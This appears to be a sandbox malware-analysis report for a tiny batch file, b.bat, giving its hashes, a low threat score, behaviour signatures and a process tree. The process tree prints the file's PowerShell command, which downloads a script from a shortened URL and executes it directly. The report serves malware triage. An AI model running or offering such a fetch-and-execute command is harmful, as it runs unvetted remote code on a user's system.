Overview

overview

10

Static

static

1

b.bat

windows7-x64

1

b.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    16s
  • max time network
    16s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    29/09/2024, 15:45

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    b.bat

  • Size

    40B

  • MD5

    242be57538ee9e59d36d9dffbb935286

  • SHA1

    e0dee09964cfbfaaad8830affb18a2b332c7f04c

  • SHA256

    c04f0537d8d04fe4bf68fffa6d51b8561fe27b8c8a32e73cf12a1ca1d77819bf

  • SHA512

    4634d51f554aa8cad5806376a0dfdf67bafbeeda6393ec156f062bf40eff46503ae94e9b8c7286a792acbb5c2f88823756eb3a87cc1a0cf9453d999ce4ce6294

Score
1/10

Malware Config

Signatures

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\b.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2292
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Powershell "irm shorturl.at/PcgQ7 | iex"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2816

Network

        MITRE ATT&CK Matrix

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/2816-4-0x000007FEF614E000-0x000007FEF614F000-memory.dmp

          Filesize

          4KB

          Download

        • memory/2816-5-0x000000001B710000-0x000000001B9F2000-memory.dmp

          Filesize

          2.9MB

          Download

        • memory/2816-6-0x0000000002000000-0x0000000002008000-memory.dmp

          Filesize

          32KB

          Download

        • memory/2816-7-0x000007FEF5E90000-0x000007FEF682D000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/2816-11-0x000007FEF5E90000-0x000007FEF682D000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/2816-10-0x000007FEF5E90000-0x000007FEF682D000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/2816-9-0x0000000002A2B000-0x0000000002A92000-memory.dmp

          Filesize

          412KB

          Download

        • memory/2816-8-0x0000000002A24000-0x0000000002A27000-memory.dmp

          Filesize

          12KB

          Download